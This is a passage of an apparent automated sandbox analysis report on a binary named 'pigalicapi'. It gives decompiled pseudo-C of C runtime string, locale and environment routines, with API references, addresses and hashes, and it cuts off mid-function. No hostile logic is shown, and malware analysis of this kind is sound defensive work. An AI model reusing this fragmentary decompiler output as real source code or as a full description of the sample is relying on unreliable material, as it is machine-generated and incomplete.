                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                                      						_t81 = 0;
                                                                                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                                                                                      						if(_t81 == 0) {
                                                                                                                                                                                                                                                                      							L36:
                                                                                                                                                                                                                                                                      							_t105 = 0;
                                                                                                                                                                                                                                                                      							L37:
                                                                                                                                                                                                                                                                      							E00FBA61A(_t81);
                                                                                                                                                                                                                                                                      							goto L38;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                                      						_t121 = _t58;
                                                                                                                                                                                                                                                                      						if(_t58 == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t100 = _v12;
                                                                                                                                                                                                                                                                      						_t60 = E00FBA9E8(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                      						_t105 = _t60;
                                                                                                                                                                                                                                                                      						if(_t105 == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                                      							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                                      							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                                      								_t101 = 0;
                                                                                                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                                                                                      								__eflags = _t101;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                                                                                      									E00FBA61A(_t101);
                                                                                                                                                                                                                                                                      									goto L36;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t62 = E00FBA9E8(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                                      								__eflags = _t62;
                                                                                                                                                                                                                                                                      								if(_t62 == 0) {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								__eflags = _a28;
                                                                                                                                                                                                                                                                      								if(_a28 != 0) {
                                                                                                                                                                                                                                                                      									_push(_a28);
                                                                                                                                                                                                                                                                      									_push(_a24);
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                      								__eflags = _t105;
                                                                                                                                                                                                                                                                      								if(_t105 != 0) {
                                                                                                                                                                                                                                                                      									E00FBA61A(_t101);
                                                                                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                                      							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                                      								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      								_t101 = E00FBBD19(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                                      								_pop(_t87);
                                                                                                                                                                                                                                                                      								__eflags = _t101;
                                                                                                                                                                                                                                                                      								if(_t101 == 0) {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                                                                                      								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							E00FBE270();
                                                                                                                                                                                                                                                                      							_t101 = _t107;
                                                                                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                                                                                      							if(_t101 == 0) {
                                                                                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t70 = _a28;
                                                                                                                                                                                                                                                                      						if(_t70 == 0) {
                                                                                                                                                                                                                                                                      							goto L37;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                                      						if(_t105 > _t70) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t71 = E00FBA9E8(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                                      						_t105 = _t71;
                                                                                                                                                                                                                                                                      						if(_t71 != 0) {
                                                                                                                                                                                                                                                                      							goto L37;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                                      					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                      					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                      						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      						_t81 = E00FBBD19(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                                      						_pop(_t85);
                                                                                                                                                                                                                                                                      						__eflags = _t81;
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                                                                                      						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					E00FBE270();
                                                                                                                                                                                                                                                                      					_t81 = _t107;
                                                                                                                                                                                                                                                                      					if(_t81 == 0) {
                                                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}


























                                                                                                                                                                                                                                                                      0x00fbc88e
                                                                                                                                                                                                                                                                      0x00fbc88f
                                                                                                                                                                                                                                                                      0x00fbc890
                                                                                                                                                                                                                                                                      0x00fbc897
                                                                                                                                                                                                                                                                      0x00fbc89b
                                                                                                                                                                                                                                                                      0x00fbc89c
                                                                                                                                                                                                                                                                      0x00fbc8a2
                                                                                                                                                                                                                                                                      0x00fbc8a8
                                                                                                                                                                                                                                                                      0x00fbc8ae
                                                                                                                                                                                                                                                                      0x00fbc8b1
                                                                                                                                                                                                                                                                      0x00fbc8b1
                                                                                                                                                                                                                                                                      0x00fbc8b4
                                                                                                                                                                                                                                                                      0x00fbc8b6
                                                                                                                                                                                                                                                                      0x00fbc8b6
                                                                                                                                                                                                                                                                      0x00fbc8b4
                                                                                                                                                                                                                                                                      0x00fbc8b8
                                                                                                                                                                                                                                                                      0x00fbc8bd
                                                                                                                                                                                                                                                                      0x00fbc8c4
                                                                                                                                                                                                                                                                      0x00fbc8c7
                                                                                                                                                                                                                                                                      0x00fbc8c7
                                                                                                                                                                                                                                                                      0x00fbc8e3
                                                                                                                                                                                                                                                                      0x00fbc8e9
                                                                                                                                                                                                                                                                      0x00fbc8ee
                                                                                                                                                                                                                                                                      0x00fbca81
                                                                                                                                                                                                                                                                      0x00fbca94
                                                                                                                                                                                                                                                                      0x00fbc8f4
                                                                                                                                                                                                                                                                      0x00fbc8f4
                                                                                                                                                                                                                                                                      0x00fbc8f7
                                                                                                                                                                                                                                                                      0x00fbc8fc
                                                                                                                                                                                                                                                                      0x00fbc900
                                                                                                                                                                                                                                                                      0x00fbc954
                                                                                                                                                                                                                                                                      0x00fbc954
                                                                                                                                                                                                                                                                      0x00fbc956
                                                                                                                                                                                                                                                                      0x00fbc958
                                                                                                                                                                                                                                                                      0x00fbca76
                                                                                                                                                                                                                                                                      0x00fbca76
                                                                                                                                                                                                                                                                      0x00fbca78
                                                                                                                                                                                                                                                                      0x00fbca79
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca7f
                                                                                                                                                                                                                                                                      0x00fbc969
                                                                                                                                                                                                                                                                      0x00fbc96f
                                                                                                                                                                                                                                                                      0x00fbc971
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc977
                                                                                                                                                                                                                                                                      0x00fbc989
                                                                                                                                                                                                                                                                      0x00fbc98e
                                                                                                                                                                                                                                                                      0x00fbc992
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc99f
                                                                                                                                                                                                                                                                      0x00fbc9d9
                                                                                                                                                                                                                                                                      0x00fbc9dc
                                                                                                                                                                                                                                                                      0x00fbc9df
                                                                                                                                                                                                                                                                      0x00fbc9e1
                                                                                                                                                                                                                                                                      0x00fbc9e3
                                                                                                                                                                                                                                                                      0x00fbc9e5
                                                                                                                                                                                                                                                                      0x00fbca31
                                                                                                                                                                                                                                                                      0x00fbca31
                                                                                                                                                                                                                                                                      0x00fbca33
                                                                                                                                                                                                                                                                      0x00fbca33
                                                                                                                                                                                                                                                                      0x00fbca35
                                                                                                                                                                                                                                                                      0x00fbca6f
                                                                                                                                                                                                                                                                      0x00fbca70
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca75
                                                                                                                                                                                                                                                                      0x00fbca49
                                                                                                                                                                                                                                                                      0x00fbca4e
                                                                                                                                                                                                                                                                      0x00fbca50
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca54
                                                                                                                                                                                                                                                                      0x00fbca55
                                                                                                                                                                                                                                                                      0x00fbca56
                                                                                                                                                                                                                                                                      0x00fbca59
                                                                                                                                                                                                                                                                      0x00fbca95
                                                                                                                                                                                                                                                                      0x00fbca98
                                                                                                                                                                                                                                                                      0x00fbca5b
                                                                                                                                                                                                                                                                      0x00fbca5b
                                                                                                                                                                                                                                                                      0x00fbca5c
                                                                                                                                                                                                                                                                      0x00fbca5c
                                                                                                                                                                                                                                                                      0x00fbca69
                                                                                                                                                                                                                                                                      0x00fbca6b
                                                                                                                                                                                                                                                                      0x00fbca6d
                                                                                                                                                                                                                                                                      0x00fbca9e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca6d
                                                                                                                                                                                                                                                                      0x00fbc9e7
                                                                                                                                                                                                                                                                      0x00fbc9ea
                                                                                                                                                                                                                                                                      0x00fbc9ec
                                                                                                                                                                                                                                                                      0x00fbc9ee
                                                                                                                                                                                                                                                                      0x00fbc9f0
                                                                                                                                                                                                                                                                      0x00fbc9f3
                                                                                                                                                                                                                                                                      0x00fbc9f8
                                                                                                                                                                                                                                                                      0x00fbca13
                                                                                                                                                                                                                                                                      0x00fbca15
                                                                                                                                                                                                                                                                      0x00fbca1f
                                                                                                                                                                                                                                                                      0x00fbca21
                                                                                                                                                                                                                                                                      0x00fbca22
                                                                                                                                                                                                                                                                      0x00fbca24
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca26
                                                                                                                                                                                                                                                                      0x00fbca2c
                                                                                                                                                                                                                                                                      0x00fbca2c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca2c
                                                                                                                                                                                                                                                                      0x00fbc9fa
                                                                                                                                                                                                                                                                      0x00fbc9fc
                                                                                                                                                                                                                                                                      0x00fbca00
                                                                                                                                                                                                                                                                      0x00fbca05
                                                                                                                                                                                                                                                                      0x00fbca07
                                                                                                                                                                                                                                                                      0x00fbca09
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca0b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbca0b
                                                                                                                                                                                                                                                                      0x00fbc9a1
                                                                                                                                                                                                                                                                      0x00fbc9a6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc9ac
                                                                                                                                                                                                                                                                      0x00fbc9ae
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc9c5
                                                                                                                                                                                                                                                                      0x00fbc9ca
                                                                                                                                                                                                                                                                      0x00fbc9ce
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc9d4
                                                                                                                                                                                                                                                                      0x00fbc907
                                                                                                                                                                                                                                                                      0x00fbc909
                                                                                                                                                                                                                                                                      0x00fbc90b
                                                                                                                                                                                                                                                                      0x00fbc913
                                                                                                                                                                                                                                                                      0x00fbc932
                                                                                                                                                                                                                                                                      0x00fbc934
                                                                                                                                                                                                                                                                      0x00fbc93e
                                                                                                                                                                                                                                                                      0x00fbc940
                                                                                                                                                                                                                                                                      0x00fbc941
                                                                                                                                                                                                                                                                      0x00fbc943
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc949
                                                                                                                                                                                                                                                                      0x00fbc94f
                                                                                                                                                                                                                                                                      0x00fbc94f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc94f
                                                                                                                                                                                                                                                                      0x00fbc917
                                                                                                                                                                                                                                                                      0x00fbc91b
                                                                                                                                                                                                                                                                      0x00fbc920
                                                                                                                                                                                                                                                                      0x00fbc924
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc92a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbc92a

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00FBCADA,?,?,00000000), ref: 00FBC8E3
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FBC91B
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00FBCADA,?,?,00000000,?,?,?), ref: 00FBC969
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FBCA00
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00FBCADA,?,?,00000000,?), ref: 00FBCA63
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FBCA70
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FBA5A1,00000000), ref: 00FBBD4B
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FBCA79
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FBCA9E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3cb5d2bcb5d2ba32ff53d8e8f7ce27a69ffa481a32e81b0efea2fb53ae337106
                                                                                                                                                                                                                                                                      • Instruction ID: fa7dd2e6076b8b9ad063016f8185f26b8dbac12cbdd83c3af506afdfaa6a2e4f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb5d2bcb5d2ba32ff53d8e8f7ce27a69ffa481a32e81b0efea2fb53ae337106
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1351D672A0021AAFDB259E66CC51FFB7BA9EB45B60F154229FD04D7140DB78DC40EA90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32 ref: 00FBAA3B
                                                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 00FBAA59
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: String
                                                                                                                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                                      • Opcode ID: ddc9d9222b600bcff41b71db7215c930e0a1bd041d3fe5fcd055f16bcbf149fb
                                                                                                                                                                                                                                                                      • Instruction ID: 4e59fa47b7c4c923fdc81dbb5fc284394d82b2c8ebeb7b6affb64f71f3865722
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddc9d9222b600bcff41b71db7215c930e0a1bd041d3fe5fcd055f16bcbf149fb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F701173250010DBBCF02AFA1DD06DEE3FA6EF08710F004154BE0426161CA7A9931FF91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FC1D19(void* __ecx) {
                                                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                                                      				WCHAR* _t19;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                                                                                      				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                                      				if(_t19 != 0) {
                                                                                                                                                                                                                                                                      					_t12 = (E00FC1CE2(_t19) - _t19 >> 1) + (E00FC1CE2(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                                      					_t6 = E00FBBD19(_t14, (E00FC1CE2(_t19) - _t19 >> 1) + (E00FC1CE2(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                                      					_t18 = _t6;
                                                                                                                                                                                                                                                                      					if(_t18 != 0) {
                                                                                                                                                                                                                                                                      						E00FBEAF0(_t18, _t19, _t12);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E00FBA6DA(0);
                                                                                                                                                                                                                                                                      					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t18 = 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t18;
                                                                                                                                                                                                                                                                      			}







                                                                                                                                                                                                                                                                      0x00fc1d19
                                                                                                                                                                                                                                                                      0x00fc1d23
                                                                                                                                                                                                                                                                      0x00fc1d27
                                                                                                                                                                                                                                                                      0x00fc1d38
                                                                                                                                                                                                                                                                      0x00fc1d3c
                                                                                                                                                                                                                                                                      0x00fc1d41
                                                                                                                                                                                                                                                                      0x00fc1d47
                                                                                                                                                                                                                                                                      0x00fc1d4c
                                                                                                                                                                                                                                                                      0x00fc1d51
                                                                                                                                                                                                                                                                      0x00fc1d56
                                                                                                                                                                                                                                                                      0x00fc1d5d
                                                                                                                                                                                                                                                                      0x00fc1d29
                                                                                                                                                                                                                                                                      0x00fc1d29
                                                                                                                                                                                                                                                                      0x00fc1d29
                                                                                                                                                                                                                                                                      0x00fc1d68

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00FC1D1D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC1D56
                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FC1D5D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2716640707-0
                                                                                                                                                                                                                                                                      • Opcode ID: 646b0f828fe72eb97259b8abb76e67549012c6c0c9337fe2c84737d824230258
                                                                                                                                                                                                                                                                      • Instruction ID: da0ca4ba49a7fbbd3846a0a844ab19dc36f338bdc01ec70884e37b45b9a05988
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 646b0f828fe72eb97259b8abb76e67549012c6c0c9337fe2c84737d824230258
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE0E57750852266912122267D8BFEB3B0CEFC27B17290019F40593142AE598C1274B1
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 119 fbb225-fbb259 GetCPInfo 120 fbb34f-fbb35c 119->120 121 fbb25f 119->121 123 fbb362-fbb372 120->123 122 fbb261-fbb26b 121->122 122->122 124 fbb26d-fbb280 122->124 125 fbb37e-fbb385 123->125 126 fbb374-fbb37c 123->126 127 fbb2a1-fbb2a3 124->127 129 fbb387-fbb38e 125->129 130 fbb395 125->130 128 fbb391-fbb393 126->128 131 fbb282-fbb289 127->131 132 fbb2a5-fbb2dc call fba4fd call fbcaa6 127->132 133 fbb397-fbb3a6 128->133 129->128 130->133 134 fbb298-fbb29a 131->134 144 fbb2e1-fbb30c call fbcaa6 132->144 133->123 136 fbb3a8-fbb3b8 call fbdc5f 133->136 138 fbb28b-fbb28d 134->138 139 fbb29c-fbb29f 134->139 138->139 142 fbb28f-fbb297 138->142 139->127 142->134 147 fbb30e-fbb318 144->147 148 fbb31a-fbb326 147->148 149 fbb328-fbb32a 147->149 150 fbb338-fbb33f 148->150 151 fbb32c-fbb331 149->151 152 fbb341 149->152 153 fbb348-fbb34b 150->153 151->150 152->153 153->147 154 fbb34d 153->154 154->136
                                                                                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                                                                                      			E00FBB225(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				char _v264;
                                                                                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                                                                                      				char _v776;
                                                                                                                                                                                                                                                                      				char _v1800;
                                                                                                                                                                                                                                                                      				char _v1814;
                                                                                                                                                                                                                                                                      				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                                      				intOrPtr _v1824;
                                                                                                                                                                                                                                                                      				signed int _v1828;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                                                                                      				void* _t72;
                                                                                                                                                                                                                                                                      				char _t73;
                                                                                                                                                                                                                                                                      				char _t74;
                                                                                                                                                                                                                                                                      				signed char _t75;
                                                                                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                                                                                      				signed char _t86;
                                                                                                                                                                                                                                                                      				char _t87;
                                                                                                                                                                                                                                                                      				char _t90;
                                                                                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                                                                                      				signed int _t95;
                                                                                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                                                                                      				char* _t97;
                                                                                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                                                                                      				signed int _t102;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t95 = __edx;
                                                                                                                                                                                                                                                                      				_t63 =  *0x104dd74; // 0xfe5fa47e
                                                                                                                                                                                                                                                                      				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                                      				_t101 = _a4;
                                                                                                                                                                                                                                                                      				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                                      					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                      					_t90 = 0;
                                                                                                                                                                                                                                                                      					_t67 = 0xffffff9f;
